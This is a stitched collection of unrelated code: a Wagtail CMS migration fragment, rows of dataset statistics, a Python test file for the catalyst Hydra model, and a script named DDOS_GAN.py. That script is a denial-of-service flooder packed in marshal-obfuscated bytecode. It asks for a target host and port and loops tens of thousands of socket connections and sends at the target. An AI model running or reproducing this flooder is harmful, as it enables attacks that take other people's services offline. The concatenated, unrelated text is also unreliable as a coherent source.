wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False)), ('automatic_download', wagtail.core.blocks.BooleanBlock(label='Auto download', required=False)), ('downloadable_file', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False))])), ('embed_video', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('url', wagtail.embeds.blocks.EmbedBlock(help_text='Link to a YouTube/Vimeo video, tweet, facebook post, etc.', label='URL', required=True))])), ('quote', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('text', wagtail.core.blocks.TextBlock(label='Quote Text', required=True, rows=4)), ('author', wagtail.core.blocks.CharBlock(label='Author', max_length=255, required=False))])), ('table', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('table', wagtail.contrib.table_block.blocks.TableBlock())])), ('google_map', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('search', wagtail.core.blocks.CharBlock(help_text='Address or search term used to find your location on the map.', label='Search query', max_length=255, required=False)), ('map_title', wagtail.core.blocks.CharBlock(help_text='Map title for screen readers, ex: "Map to Goodale Park"', label='Map title', max_length=255, required=False)), ('place_id', wagtail.core.blocks.CharBlock(help_text='Requires API key to use place ID.', label='Google place ID', max_length=255, required=False)), ('map_zoom_level', wagtail.core.blocks.IntegerBlock(default=14, help_text='Requires API key to use zoom. 1: World, 5: Landmass/continent, 10: City, 15: Streets, 20: Buildings', label='Map zoom level', required=False))])), ('page_list', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagelist_block.html', 'General, simple list'), ('coderedcms/blocks/pagelist_list_group.html', 'General, list group navigation panel'), ('coderedcms/blocks/pagelist_article_media.html', 'Article, media format'), ('coderedcms/blocks/pagelist_article_card_group.html', 'Article, card group - attached cards of equal size'), ('coderedcms/blocks/pagelist_article_card_deck.html', 'Article, card deck - separate cards of equal size'), ('coderedcms/blocks/pagelist_article_card_columns.html', 'Article, card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('indexed_by', wagtail.core.blocks.PageChooserBlock(help_text='Show a preview of pages that are children of the selected page. Uses ordering specified in the page’s LAYOUT tab.', label='Parent page', required=True)), ('classified_by', coderedcms.blocks.base_blocks.ClassifierTermChooserBlock(help_text='Only show pages that are classified with this term.', label='Classified as', required=False)), ('show_preview', wagtail.core.blocks.BooleanBlock(default=False, label='Show body preview', required=False)), ('num_posts', wagtail.core.blocks.IntegerBlock(default=3, label='Number of pages to show'))])), ('page_preview', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/pagepreview_card.html', 'Card'), ('coderedcms/blocks/pagepreview_form.html', 'Form inputs')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('page', wagtail.core.blocks.PageChooserBlock(help_text='Show a mini preview of the selected page.', label='Page to preview', required=True))]))], label='Content')), ('footer', wagtail.core.blocks.StreamBlock([('text', wagtail.core.blocks.CharBlock(icon='fa-file-text-o', label='Simple Text', max_length=255)), ('button', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], label='Modal footer', required=False))])), ('map', wagtail.core.blocks.StructBlock([('map', cartoview_cms.models.streamfields.Blocks.MapChooserBlock(required=True))])), ('map_catalog', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(label='Title', max_length=240)), ('featured_maps', wagtail.core.blocks.ListBlock(cartoview_cms.models.streamfields.Blocks.FeaturedMapChooser(), label='Featured Maps'))])), ('pricelist', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('heading', wagtail.core.blocks.CharBlock(label='Heading', max_length=255, required=False)), ('items', wagtail.core.blocks.StreamBlock([('item', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', required=False)), ('name', wagtail.core.blocks.CharBlock(label='Name', max_length=255, required=True)), ('description', wagtail.core.blocks.TextBlock(label='Description', required=False, rows=4)), ('price', wagtail.core.blocks.CharBlock(help_text='Any text here. Include currency sign if desired.', label='Price', required=True))]))], label='Items'))])), ('reusable_content', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('content', wagtail.snippets.blocks.SnippetChooserBlock('coderedcms.ReusableContent'))]))], label='Content'))]))], label='Content'))])), ('cardgrid', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/cardgrid_group.html', 'Card group - attached cards of equal size'), ('coderedcms/blocks/cardgrid_deck.html', 'Card deck - separate cards of equal size'), ('coderedcms/blocks/cardgrid_columns.html', 'Card masonry - fluid brick pattern')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('fluid', wagtail.core.blocks.BooleanBlock(label='Full width', required=False)), ('content', wagtail.core.blocks.StreamBlock([('card', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default'), ('coderedcms/blocks/card_block.html', 'Card'), ('coderedcms/blocks/card_head.html', 'Card with header'), ('coderedcms/blocks/card_foot.html', 'Card with footer'), ('coderedcms/blocks/card_head_foot.html', 'Card with header and footer'), ('coderedcms/blocks/card_blurb.html', 'Blurb - rounded image and no border'), ('coderedcms/blocks/card_img.html', 'Cover image - use image as background')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False))])), ('image', wagtail.images.blocks.ImageChooserBlock(label='Image', max_length=255, required=False)), ('title', wagtail.core.blocks.CharBlock(label='Title', max_length=255, required=False)), ('subtitle', wagtail.core.blocks.CharBlock(label='Subtitle', max_length=255, required=False)), ('description', wagtail.core.blocks.RichTextBlock(features=['bold', 'italic', 'ol', 'ul', 'hr', 'link', 'document-link'], label='Body')), ('links', wagtail.core.blocks.StreamBlock([('Links', wagtail.core.blocks.StructBlock([('settings', wagtail.core.blocks.StructBlock([('custom_template', wagtail.core.blocks.ChoiceBlock(choices=[('', 'Default')], label='Template', required=False)), ('custom_css_class', wagtail.core.blocks.CharBlock(label='Custom CSS Class', max_length=255, required=False)), ('custom_id', wagtail.core.blocks.CharBlock(label='Custom ID', max_length=255, required=False)), ('ga_tracking_event_category', wagtail.core.blocks.CharBlock(label='Tracking Event Category', max_length=255, required=False)), ('ga_tracking_event_label', wagtail.core.blocks.CharBlock(label='Tracking Event Label', max_length=255, required=False))])), ('page_link', wagtail.core.blocks.PageChooserBlock(label='Page link', required=False)), ('doc_link', wagtail.documents.blocks.DocumentChooserBlock(label='Document link', required=False)), ('other_link', wagtail.core.blocks.CharBlock(label='Other link', max_length=255, required=False)), ('button_title', wagtail.core.blocks.CharBlock(label='Button Title', max_length=255, required=True)), ('button_style', wagtail.core.blocks.ChoiceBlock(choices=[('btn-primary', 'Primary'), ('btn-secondary', 'Secondary'), ('btn-success', 'Success'), ('btn-danger', 'Danger'), ('btn-warning', 'Warning'), ('btn-info', 'Info'), ('btn-link', 'Link'), ('btn-light', 'Light'), ('btn-dark', 'Dark'), ('btn-outline-primary', 'Outline Primary'), ('btn-outline-secondary', 'Outline Secondary'), ('btn-outline-success', 'Outline Success'), ('btn-outline-danger', 'Outline Danger'), ('btn-outline-warning', 'Outline Warning'), ('btn-outline-info', 'Outline Info'), ('btn-outline-light', 'Outline Light'), ('btn-outline-dark', 'Outline Dark')], label='Button Style', required=False)), ('button_size', wagtail.core.blocks.ChoiceBlock(choices=[('btn-sm', 'Small'), ('', 'Default'), ('btn-lg', 'Large')], label='Button Size', required=False))]))], blank=True, label='Links', required=False))]))], label='Content'))])), ('html', wagtail.core.blocks.RawHTMLBlock(form_classname='monospace', icon='code', label='HTML'))], blank=True, null=True),
),
]
| 4,624.205882
| 78,219
| 0.738461
| 19,987
| 157,223
| 5.710962
| 0.017361
| 0.117377
| 0.180954
| 0.117535
| 0.995979
| 0.995401
| 0.995401
| 0.995401
| 0.995401
| 0.995401
| 0
| 0.013382
| 0.056983
| 157,223
| 33
| 78,220
| 4,764.333333
| 0.756495
| 0.000293
| 0
| 0.296296
| 1
| 0.592593
| 0.358479
| 0.047202
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.407407
| 0
| 0.518519
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
869997e3b77c9d5acacc7f02c3d9ca26ecfeb342
| 4,924
|
py
|
Python
|
DDOS_GAN.py
|
lildwagz/DDOS
|
f6dd8682032bd9a272cbd9a9db6454832970f2a4
|
[
"Apache-2.0"
] | null | null | null |
DDOS_GAN.py
|
lildwagz/DDOS
|
f6dd8682032bd9a272cbd9a9db6454832970f2a4
|
[
"Apache-2.0"
] | null | null | null |
DDOS_GAN.py
|
lildwagz/DDOS
|
f6dd8682032bd9a272cbd9a9db6454832970f2a4
|
[
"Apache-2.0"
] | 1
|
2021-01-26T13:49:53.000Z
|
2021-01-26T13:49:53.000Z
|
#Compiled By xNot_Found
#Github : https://github.com/hatakecnk
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00sS\x01\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00e\x01\x00j\x05\x00d\x02\x00\x83\x01\x00\x01e\x01\x00j\x05\x00d\x03\x00\x83\x01\x00\x01d\x04\x00Z\x06\x00e\x06\x00GHd\x05\x00\x84\x00\x00Z\x07\x00e\x01\x00j\x08\x00\x83\x00\x00Z\t\x00d\x06\x00GHe\n\x00d\x07\x00\x83\x01\x00Z\x0b\x00d\x08\x00GHe\x0c\x00d\x07\x00\x83\x01\x00Z\r\x00d\t\x00Z\x0e\x00e\x04\x00j\x0f\x00e\x0b\x00\x83\x01\x00Z\x10\x00d\n\x00e\x0b\x00\x17d\x0b\x00\x17GHd\x0c\x00e\x10\x00\x17d\x0b\x00\x17GHd\r\x00Z\x11\x00d\x0e\x00GHd\x0f\x00\x84\x00\x00Z\x12\x00x\x1e\x00e\x13\x00d\x10\x00e\x0e\x00\x83\x02\x00D]\r\x00Z\x14\x00e\x12\x00\x83\x00\x00\x01q\xeb\x00Wd\x11\x00GHe\x15\x00d\x12\x00k\x02\x00rO\x01e\n\x00d\x13\x00\x83\x01\x00Z\x16\x00e\x16\x00j\x17\x00\x83\x00\x00d\x14\x00j\x18\x00\x83\x00\x00k\x06\x00r;\x01e\x07\x00\x83\x00\x00\x01qO\x01e\x01\x00j\x05\x00e\t\x00d\x15\x00\x17\x83\x01\x00\x01n\x00\x00d\x01\x00S(\x16\x00\x00\x00i\xff\xff\xff\xffNt\x05\x00\x00\x00clearsf\x00\x00\x00xdg-open https://api.whatsapp.com/send?phone=62895332579555text=Halo%20Admin%20please%20konfirmasi.coms\x01\x01\x00\x00\n\x1b[1;96m|#########################################|\n\x1b[1;96m|###| Author : lil_dwagz |###| \n\x1b[1;96m|###| IG : lil_dwagz |###|\n\x1b[1;96m|###| Team : IES_ATTACKERS |###|\n\x1b[1;96m|#########################################|\nc\x00\x00\x00\x00\x01\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s#\x00\x00\x00t\x00\x00j\x01\x00}\x00\x00t\x02\x00j\x03\x00|\x00\x00|\x00\x00t\x00\x00j\x04\x00\x8c\x02\x00\x01d\x00\x00S(\x01\x00\x00\x00N(\x05\x00\x00\x00t\x03\x00\x00\x00syst\n\x00\x00\x00executablet\x02\x00\x00\x00ost\x05\x00\x00\x00execlt\x04\x00\x00\x00argv(\x01\x00\x00\x00t\x06\x00\x00\x00python(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x0f\x00\x00\x00restart_program\x11\x00\x00\x00s\x04\x00\x00\x00\x00\x01\t\x01s3\x00\x00\x00\x1b[1;91minput web url \x1b[1;95m[ex : www.Example.com ]s\x14\x00\x00\x00\x1b[1;94mLIL_DWAGZ$ : s%\x00\x00\x00\x1b[1;91minput port \x1b[1;95m[ex : 8080 ]iP\xc3\x00\x00s\x1a\x00\x00\x00\x1b[1;91m Attacking \x1b[1;93m[t\x01\x00\x00\x00]s\x1d\x00\x00\x00\x1b[1;91m Attack to ip \x1b[1;93m[s1\x00\x00\x00ANONYMOUS AND INDONESIAN ERROR SYSTEM WAS HERE...s.\x00\x00\x00\x1b[1;91mATTACKING..............................c\x00\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa0\x00\x00\x00t\x00\x00j\x00\x00t\x00\x00j\x01\x00t\x00\x00j\x02\x00\x83\x02\x00}\x00\x00yG\x00|\x00\x00j\x03\x00t\x04\x00d\x01\x00f\x02\x00\x83\x01\x00\x01|\x00\x00j\x05\x00t\x06\x00\x83\x01\x00\x01|\x00\x00j\x07\x00t\x06\x00t\x08\x00t\t\x00f\x02\x00\x83\x02\x00\x01|\x00\x00j\x05\x00t\x06\x00\x83\x01\x00\x01Wn#\x00\x04t\x00\x00j\n\x00k\n\x00r\x84\x00\x01}\x01\x00\x01d\x02\x00t\x08\x00\x17d\x03\x00\x17GHn\x01\x00Xd\x04\x00t\x08\x00\x17d\x03\x00\x17GH|\x00\x00j\x0b\x00\x83\x00\x00\x01d\x00\x00S(\x05\x00\x00\x00NiP\x00\x00\x00s\x1d\x00\x00\x00\x1b[1;91m ...no connection to [s\x05\x00\x00\x00] ...s(\x00\x00\x00\x1b[1;92m ...start sending the coffin to [(\x0c\x00\x00\x00t\x06\x00\x00\x00sockett\x07\x00\x00\x00AF_INETt\x0b\x00\x00\x00SOCK_STREAMt\x07\x00\x00\x00connectt\x04\x00\x00\x00hostt\x04\x00\x00\x00sendt\x07\x00\x00\x00messaget\x06\x00\x00\x00sendtot\x02\x00\x00\x00ipt\x04\x00\x00\x00portt\x05\x00\x00\x00errort\x05\x00\x00\x00close(\x02\x00\x00\x00t\x04\x00\x00\x00ddost\x03\x00\x00\x00msg(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x03\x00\x00\x00dos\x1f\x00\x00\x00s\x14\x00\x00\x00\x00\x02\x18\x01\x03\x01\x13\x01\r\x01\x16\x01\x11\x01\x12\x01\x11\x01\r\x01i\x01\x00\x00\x00s!\x00\x00\x00Ddos anda telah berhenti.........t\x08\x00\x00\x00__main__s3\x00\x00\x00Anda mau lanjut ddos ??? ketik fire untuk lanjut...s\x0e\x00\x00\x00y Y fire FIREs\n\x00\x00\x00Deqmain.py(\x19\x00\x00\x00t\x04\x00\x00\x00timeR\x03\x00\x00\x00R\x01\x00\x00\x00t\x06\x00\x00\x00stringR\t\x00\x00\x00t\x06\x00\x00\x00systemt\x05\x00\x00\x00banerR\x07\x00\x00\x00t\x06\x00\x00\x00getcwdt\x06\x00\x00\x00curdirt\t\x00\x00\x00raw_inputR\r\x00\x00\x00t\x05\x00\x00\x00inputR\x12\x00\x00\x00R\x0c\x00\x00\x00t\r\x00\x00\x00gethostbynameR\x11\x00\x00\x00R\x0f\x00\x00\x00R\x17\x00\x00\x00t\x05\x00\x00\x00ranget\x01\x00\x00\x00it\x08\x00\x00\x00__name__t\x06\x00\x00\x00answert\x05\x00\x00\x00stript\x05\x00\x00\x00split(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x08\x00\x00\x00<module>\x02\x00\x00\x00s:\x00\x00\x00\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\r\x01\r\x07\x06\x01\x05\x01\t\x03\x0c\x01\x05\x01\x0c\x01\x05\x01\x0c\x01\x06\x01\x0f\x01\r\x01\r\x01\x06\x01\x05\x01\t\x0c\x16\x01\x0b\x01\x05\x01\x0c\x01\x0c\x01\x18\x01\n\x02'))
| 1,231
| 4,846
| 0.734768
| 1,033
| 4,924
| 3.485963
| 0.197483
| 0.274924
| 0.14246
| 0.093307
| 0.339906
| 0.224938
| 0.101638
| 0.073591
| 0.058595
| 0.058595
| 0
| 0.359459
| 0.023152
| 4,924
| 4
| 4,846
| 1,231
| 0.389189
| 0.011982
| 0
| 0
| 0
| 0.5
| 0.991571
| 0.875206
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
86d4fec0602c2a0dc8b4453d08c52743a2735e02
| 24,993
|
py
|
Python
|
tests/catalyst/contrib/models/test_hydra.py
|
stjordanis/catalyst-1
|
93eedf0b9520bf1f83f63b13d6818df2a1e85b33
|
[
"Apache-2.0"
] | 4
|
2019-12-14T07:27:09.000Z
|
2021-03-23T14:34:37.000Z
|
tests/catalyst/contrib/models/test_hydra.py
|
Ran485/catalyst
|
84bc7576c981278f389279d87dda85dd66a758b6
|
[
"Apache-2.0"
] | null | null | null |
tests/catalyst/contrib/models/test_hydra.py
|
Ran485/catalyst
|
84bc7576c981278f389279d87dda85dd66a758b6
|
[
"Apache-2.0"
] | null | null | null |
from collections import OrderedDict
import copy
from pathlib import Path
import pytest
import torch
from torch import nn
from catalyst import utils
from catalyst.contrib.models import Hydra, SequentialNet
from catalyst.contrib.nn.modules import Normalize
def _pop_normalization(dct):
for values in dct.values():
if isinstance(values, dict):
values.pop("normalize_output", None)
_pop_normalization(values)
def _check_lists(left, right):
assert sorted(left) == sorted(right)
def _check_named_parameters(left, right):
left_keys = dict(left.named_parameters()).keys()
right_keys = dict(right.named_parameters()).keys()
_check_lists(left_keys, right_keys)
def test_config1():
"""@TODO: Docs. Contribution is welcome."""
config1 = {
"encoder_params": {
"hiddens": [16, 16],
"layer_fn": {"module": "Linear", "bias": False},
"norm_fn": "LayerNorm",
},
"heads_params": {
"head1": {"hiddens": [2], "layer_fn": {"module": "Linear", "bias": True}},
"_head2": {
"_hidden": {"hiddens": [16], "layer_fn": {"module": "Linear", "bias": False}},
"head2_1": {
"hiddens": [32],
"layer_fn": {"module": "Linear", "bias": True},
"normalize_output": True,
},
"_head2_2": {
"_hidden": {
"hiddens": [16, 16, 16],
"layer_fn": {"module": "Linear", "bias": False},
},
"head2_2_1": {
"hiddens": [32],
"layer_fn": {"module": "Linear", "bias": True},
"normalize_output": False,
},
},
},
},
"embedders_params": {
"target1": {"num_embeddings": 2, "normalize_output": True},
"target2": {"num_embeddings": 2, "normalize_output": False},
},
}
hydra = Hydra.get_from_params(**config1)
config1_copy = copy.deepcopy(config1)
_pop_normalization(config1_copy)
encoder_params = config1_copy["encoder_params"]
heads_params = config1_copy["heads_params"]
heads_params["head1"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_hidden"]["hiddens"].insert(0, 16)
heads_params["_head2"]["head2_1"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_head2_2"]["_hidden"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_head2_2"]["head2_2_1"]["hiddens"].insert(0, 16)
net = nn.ModuleDict(
{
"encoder": SequentialNet(**encoder_params),
"embedders": nn.ModuleDict(
{
"target1": nn.Sequential(
OrderedDict(
[
("embedding", nn.Embedding(embedding_dim=16, num_embeddings=2)),
("normalize", Normalize()),
]
)
),
"target2": nn.Sequential(
OrderedDict(
[("embedding", nn.Embedding(embedding_dim=16, num_embeddings=2))]
)
),
}
),
"heads": nn.ModuleDict(
{
"head1": nn.Sequential(
OrderedDict([("net", SequentialNet(**heads_params["head1"]))])
),
"_head2": nn.ModuleDict(
{
"_hidden": nn.Sequential(
OrderedDict(
[("net", SequentialNet(**heads_params["_head2"]["_hidden"]))]
)
),
"head2_1": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(**heads_params["_head2"]["head2_1"]),
),
("normalize", Normalize()),
]
)
),
"_head2_2": nn.ModuleDict(
{
"_hidden": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(
**heads_params["_head2"]["_head2_2"][
"_hidden"
]
),
)
]
)
),
"head2_2_1": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(
**heads_params["_head2"]["_head2_2"][
"head2_2_1"
]
),
)
]
)
),
}
),
}
),
}
),
}
)
_check_named_parameters(hydra.encoder, net["encoder"])
_check_named_parameters(hydra.heads, net["heads"])
_check_named_parameters(hydra.embedders, net["embedders"])
input_ = torch.rand(1, 16)
output_kv = hydra(input_)
assert (input_ == output_kv["features"]).sum().item() == 16
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
]
_check_lists(output_kv.keys(), kv_keys)
output_kv = hydra(input_, target1=torch.ones(1, 2).long())
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
"target1_embeddings",
]
_check_lists(output_kv.keys(), kv_keys)
output_kv = hydra(input_, target2=torch.ones(1, 2).long())
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
"target2_embeddings",
]
_check_lists(output_kv.keys(), kv_keys)
output_kv = hydra(input_, target1=torch.ones(1, 2).long(), target2=torch.ones(1, 2).long())
kv_keys = [
"features",
"embeddings",
"head1",
"_head2/",
"_head2/head2_1",
"_head2/_head2_2/",
"_head2/_head2_2/head2_2_1",
"target1_embeddings",
"target2_embeddings",
]
_check_lists(output_kv.keys(), kv_keys)
output_tuple = hydra.forward_tuple(input_)
assert len(output_tuple) == 5
assert (output_tuple[0] == output_kv["features"]).sum().item() == 16
assert (output_tuple[1] == output_kv["embeddings"]).sum().item() == 16
def test_config2():
"""@TODO: Docs. Contribution is welcome."""
config2 = {
"in_features": 16,
"heads_params": {
"head1": {"hiddens": [2], "layer_fn": {"module": "Linear", "bias": True}},
"_head2": {
"_hidden": {"hiddens": [16], "layer_fn": {"module": "Linear", "bias": False}},
"head2_1": {
"hiddens": [32],
"layer_fn": {"module": "Linear", "bias": True},
"normalize_output": True,
},
"_head2_2": {
"_hidden": {
"hiddens": [16, 16, 16],
"layer_fn": {"module": "Linear", "bias": False},
},
"head2_2_1": {
"hiddens": [32],
"layer_fn": {"module": "Linear", "bias": True},
"normalize_output": False,
},
},
},
},
}
hydra = Hydra.get_from_params(**config2)
config2_copy = copy.deepcopy(config2)
_pop_normalization(config2_copy)
heads_params = config2_copy["heads_params"]
heads_params["head1"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_hidden"]["hiddens"].insert(0, 16)
heads_params["_head2"]["head2_1"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_head2_2"]["_hidden"]["hiddens"].insert(0, 16)
heads_params["_head2"]["_head2_2"]["head2_2_1"]["hiddens"].insert(0, 16)
net = nn.ModuleDict(
{
"encoder": nn.Sequential(),
"heads": nn.ModuleDict(
{
"head1": nn.Sequential(
OrderedDict([("net", SequentialNet(**heads_params["head1"]))])
),
"_head2": nn.ModuleDict(
{
"_hidden": nn.Sequential(
OrderedDict(
[("net", SequentialNet(**heads_params["_head2"]["_hidden"]))]
)
),
"head2_1": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(**heads_params["_head2"]["head2_1"]),
),
("normalize", Normalize()),
]
)
),
"_head2_2": nn.ModuleDict(
{
"_hidden": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(
**heads_params["_head2"]["_head2_2"][
"_hidden"
]
),
)
]
)
),
"head2_2_1": nn.Sequential(
OrderedDict(
[
(
"net",
SequentialNet(
**heads_params["_head2"]["_head2_2"][
"head2_2_1"
]
),
)
]
)
),
}
),
}
),
}
),
}
)
_check_named_parameters(hydra.encoder, net["encoder"])
_check_named_parameters(hydra.heads, net["heads"])
assert hydra.embedders == {}
